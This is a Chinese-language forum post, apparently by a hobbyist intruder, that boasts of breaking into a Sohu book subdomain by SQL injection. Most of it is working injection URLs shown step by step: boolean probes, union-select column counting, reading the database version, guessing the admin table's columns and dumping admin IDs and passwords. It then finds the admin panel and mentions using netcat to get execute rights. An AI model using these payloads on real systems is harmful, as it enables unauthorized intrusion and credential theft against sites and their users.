前几日看了小黄牛入侵SOHU!手也痒了!(我妈一般说这个叫手贱!)找了几个
注射漏洞后,发现这个可以利用。后台权限也很大!
按照套路找到
http://yc.book.sohu.com/XXXXX.php?XXXXX=2&XXXXXX=16
http://yc.XXXX.sohu.com/XXXXX.php?XXXXX=2&XXXXXX=16 and 1=1
http://yc.XXXX.sohu.com/XXXXX.php?XXXXX=2&XXXXXX=16 and 1=2
union到9 OK正确了 记录下 1 2 7 4 0000-00-00 8
http://yc.XXXXX.sohu.com/XXXXX.p ... XXs=16%20and%201=2%
20union%20select%201,2,3,4,5,6,7,8,9%20from%20admin/*
对了!
插上 version() database() 这里随便在 2 7 4 插
http://yc。XXXXX.sohu.com/XXXXXp ... XXX=16%20and%201=2%
20union%20select%201,2,3,database()%20,5,6,version(),8,9%20from%
20admin/*
在2位置写上 USER ADMIN USERADMIN ADMINUSER 都是不正确的 运气真不好
那就猜下PASS吧! 从USERPASS ADMINPASS ADMINPWD PASS 最后到PASSWORD终于
对了
老是猜不到A帐户也着急啊!问了小黄牛!他叫我把2插上ID试下,也许会有收获
http://yc.XXXXX.sohu.com/XXXX.php?XXXX=2&XXXX=16%20and%201=2%
20union%20select%201,id,3,database()%20,5,6,version(),8,9%20from%
20admin/*
爽死了!真的可以也!太崇拜小黄牛了!
接着玩
http://yc.XXXX.sohu.com/XXXXX.php?XXXX=2&XXXX=16%20and%201=2%
20union%20select%201,id,3,database(),5,6,password,8,9%20from%20admin/*
OK了! 什么都知道了
去找后台!0.1秒
http://yc.XXXX.sohu.com/XXXXX/admXXXXXXX.php 找到了 进去
就找这里!这个后台很多功能 拿他很容易 但是权限设置很BT!所以要用NC转到
其他目录下才有执行权限!谁叫他PHPH生成HTM 那就有很多目录权限要开执行和
写权限!
